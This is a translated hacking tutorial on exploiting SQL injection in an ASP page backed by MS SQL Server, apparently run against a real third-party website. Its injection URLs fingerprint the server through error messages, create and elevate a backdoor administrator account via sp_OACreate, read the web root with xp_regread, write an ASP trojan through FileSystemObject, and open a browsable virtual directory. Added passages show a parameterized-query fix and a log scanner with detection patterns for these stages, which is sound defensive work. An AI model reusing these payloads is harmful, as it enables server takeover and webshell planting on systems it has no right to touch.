Squeeze the last drop of MS SQL

Source: Internet
Author: User
Tags: sql server, odbc, sql server driver

Network security is a constantly shifting field, and it keeps people worried. When we talk about databases, the names that come to mind are the powerful Oracle and MS SQL, and Microsoft's product has had the most vulnerabilities. Today we will use SQL injection to make MS SQL work for us.

The walkthrough below uses a well-known website as the test target. I assume you have already mastered enumerating databases, tables and fields through SQL injection, so I will not cover that here.

MS SQL built-in functions:

@@VERSION   returns the Windows version, the MS SQL version and the patch level
USER_NAME() returns the user of the current connection
DB_NAME()   returns the database of the current connection
HOST_NAME() returns the name of the current host

This information helps us to have a simple understanding of the system.

Okay. Let's get started!

Statement: http://www.xxx.com/list.asp?classid=1'
Returns: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' Order By Id DESC'. /list.asp, line 290

The "unclosed quotation mark" error tells us that SQL injection exists. With the vulnerability found, we put the functions listed above to work:

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int. /list.asp, line 290

From this we learn that the box runs Windows 2000 Advanced Server with SP4 and SQL Server 2000 with SP3 (build 8.00.760 is the SP3 build). Having read the server information, the next thing to understand is what permissions the database connection has:

Statement: http://www.xxx.com/list.asp?classid=1 and user_name()='dbo'
Returns: the normal page

So the connection runs as dbo. A connection user that maps to dbo is very often a member of the sysadmin server role, because SQL Server maps members of that role to the dbo user in every database by default.

The logic of this test is the same as the familiar "and 1=2" true/false check; it only tells us about permissions. Let's look further:

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'dbo' to a column of data type int. /list.asp, line 290

This confirms that the database connection user has high privileges and can be taken to be a member of the sysadmin server role.
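Every probe above works for two reasons: list.asp pastes the classid value straight into its SQL string, and classic ASP sends the provider's error text back to the browser, which turns the "convert nvarchar to int" message into a read channel. The following is an added example (not code from the article) that puts the vulnerable handler next to a hardened one; the table, its rows and the use of SQLite in place of SQL Server are assumptions made so the two handlers can be run offline.

```python
import re
import sqlite3

# Constructed stand-in for the article's database: the table, the rows and the use
# of SQLite instead of SQL Server are assumptions made only so this runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE list (id INTEGER PRIMARY KEY, classid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO list (classid, title) VALUES (?, ?)",
        [(1, "news one"), (1, "news two"), (2, "other class")],
    )
    return conn


def list_unsafe(conn, classid):
    """The pattern behind list.asp: the query-string value is concatenated into the
    SQL, and the driver's error text is returned to the client, which is exactly the
    oracle that the article's 0<>(select ...) probes read from."""
    sql = "SELECT title FROM list WHERE classid = " + classid + " ORDER BY id DESC"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "error: " + str(exc)


def list_safe(conn, classid):
    """Hardened handler: the id must be a short digit string, it is bound as a
    parameter rather than concatenated, and database errors are logged server-side
    instead of echoed, so a probe has nothing to read."""
    if not re.fullmatch(r"[0-9]{1,9}", classid):
        return "error: invalid id"
    try:
        rows = conn.execute(
            "SELECT title FROM list WHERE classid = ? ORDER BY id DESC",
            (int(classid),),
        )
        return [row[0] for row in rows]
    except sqlite3.Error:
        # record the exception for operators here; the client sees only this text
        return "error: request failed"


if __name__ == "__main__":
    db = make_db()
    probe = "1 and 0<>(select user_name())"  # the article's permission probe
    print(list_unsafe(db, probe))  # the driver's error text leaks to the client
    print(list_safe(db, probe))    # error: invalid id
```

With the unsafe handler, "1 or 1=1" returns every row and the article's user_name() probe returns the driver's own error message; the safe handler rejects both before any SQL runs. In the real ASP application the equivalent fix is an ADO Command with typed parameters plus turning off detailed error pages.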

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'GameIMGSys' to a column of data type int. /list.asp, line 290

This exposes the name of the current database. With a connection this privileged, we naturally want to go straight for a webshell or NT admin. Whether NT admin is reachable depends on the server's configuration; if the server is configured carelessly, we take NT admin directly, using the following:

MS SQL built-in stored procedures:

sp_OACreate (the most dangerous of the set; executing it requires the sysadmin role)
sp_OAGetErrorInfo
sp_OAGetProperty
sp_OAMethod
sp_OASetProperty
sp_OAStop

Since MS SQL can execute several statements in a single request, we get to run more than one statement at a time.

Statement: http://www.xxx.com/list.asp?classid=1; DECLARE @shell int EXEC sp_OACreate 'wscript.shell', @shell OUTPUT EXEC sp_OAMethod @shell, 'run', null, 'C:\winnt\system32\1_.exe /c net user cntest chinatest /add'
Returns: the normal page. (Note: if the shell exists on the host, a user cntest is created on the server.)

After the user is created, add it to the administrators group with net localgroup administrators cntest /add. If the other side's host has port 3389 or IPC open, I don't need to explain what comes next.

What if it is a professionally hosted server that only opens port 80? Then we can still obtain a webshell and penetrate from there step by step.

With such high permissions we could first create a table, write the ASP Trojan into it, and then use MAKEWEBTASK to obtain a webshell. Writing that by hand is tedious, and the biggest obstacle to uploading a webshell is knowing the web directory. There are ready-made tools on the Internet that obtain webshells through BACKUP and MAKEWEBTASK. Here I recommend first obtaining the web path by reading the registry through a stored procedure:

Use the stored procedure xp_regread (it reads a registry key value, and execute permission on it is granted to public):

Statement: http://www.xxx.com/list.asp?classid=1; create table newtable (id int IDENTITY(1,1), paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots', @value_name='/', @value=@test OUTPUT insert into newtable (paths) values (@test)

By default, the IIS virtual roots are stored in the registry under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots.

Now read the stored value back out of the table with the same error-based trick used to read fields:

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--
Returns: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the varchar value 'E:\www,,201' to a column of data type int.

This tells us the web directory is E:\www. Now FSO can be used to write the ASP Trojan directly (note: sysadmin permission is needed to drive FSO this way, and FSO must be available on the host):

Statement: http://www.xxx.com/list.asp?classid=1; declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'e:\www\test.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'On Error Resume Next' --

This creates test.asp under E:\www and writes the line On Error Resume Next into it:

Statement: http://www.xxx.com/list.asp?classid=1; declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'e:\www\test.asp', 8 exec @ret = sp_oamethod @f, 'writeline', NULL, 'asp horse' --

This appends a line to E:\www\test.asp; "asp horse" stands for the ASP Trojan code, and the whole Trojan can be written this way, line by line. (Percent signs in the payload must be URL-encoded as %25.) What if we cannot get the web directory at all? Then we need to find out whether the site runs under the default web site or under a site keyed by domain name.

Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e","e:\"'

This creates a virtual directory e under the Default Web Site, pointing at the E: drive.

Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

Adding browse permission to virtual directory e is enough: we have opened a virtual site for ourselves, and the web directory problem is essentially solved. The rest is up to you. This is where our use of MS SQL to obtain a webshell ends; the next part of the job is yours.
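Every step of the chain above (the @@version and user_name() probes, the stacked sp_OACreate call that runs a command, the xp_regread lookup of the web path, and the FSO writes) leaves its payload in the IIS request log, because all of it travels in the classid query string. The following is an added example, not code from the article, that scans IIS-style W3C log lines for those stages; the five log lines are constructed to mirror the requests the article walks through, and the field layout (date time c-ip method uri-stem uri-query status) is an assumption about the log format.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log: IIS-style W3C fields, assumed layout
# date time c-ip method uri-stem uri-query status. Three lines mirror the
# article's requests, two are benign traffic.
SAMPLE_LOG = """\
2003-12-01 10:00:01 10.0.0.5 GET /list.asp classid=1 200
2003-12-01 10:00:07 10.0.0.5 GET /list.asp classid=1+and+0%3C%3E(select+@@version)-- 500
2003-12-01 10:00:20 10.0.0.5 GET /list.asp classid=1;declare+@o+int+exec+sp_oacreate+'wscript.shell',@o+out-- 200
2003-12-01 10:00:33 10.0.0.5 GET /list.asp classid=1;exec+master..xp_regread+@rootkey='HKEY_LOCAL_MACHINE'-- 200
2003-12-01 10:00:40 10.0.0.9 GET /list.asp classid=2 200
"""

# One signature per stage of the chain described in the article.
SIGNATURES = {
    "stacked_statement": re.compile(
        r";\s*(?:declare|exec(?:ute)?|create|insert|update|delete|drop)\b", re.I),
    "ole_automation": re.compile(
        r"\bsp_oa(?:create|method|getproperty|setproperty|geterrorinfo|stop|destroy)\b", re.I),
    "registry_or_shell": re.compile(r"\bxp_(?:regread|regwrite|cmdshell)\b", re.I),
    "recon_function": re.compile(
        r"@@version|\b(?:user_name|db_name|host_name)\s*\(", re.I),
    "error_based_probe": re.compile(
        r"\b(?:and|or)\s+\d+\s*(?:<>|=)\s*\(\s*select\b", re.I),
}


def classify_query(raw_query):
    """URL-decode the uri-query once (so %3C%3E and '+' cannot hide the payload)
    and return the sorted names of every signature it matches."""
    decoded = unquote_plus(raw_query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_log(text):
    """Return one hit per flagged request with client IP, URI, status and tags."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or fields[3] not in ("GET", "POST"):
            continue  # blank, comment or malformed line
        tags = classify_query(fields[5])
        if tags:
            hits.append({"ip": fields[2], "uri": fields[4],
                         "status": fields[6], "tags": tags})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["uri"], ", ".join(hit["tags"]))
```

Run against the sample, the scanner flags the three probe requests from 10.0.0.5 and ignores the benign ones; a recon hit followed by a stacked sp_OACreate or xp_regread hit from the same client is the sequence worth alerting on. On SQL Server 2005 and later the sp_OA* procedures are disabled unless the 'Ole Automation Procedures' sp_configure option is turned on, so a hit on that signature is also a cue to check that setting and to confirm the application login is not a sysadmin.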
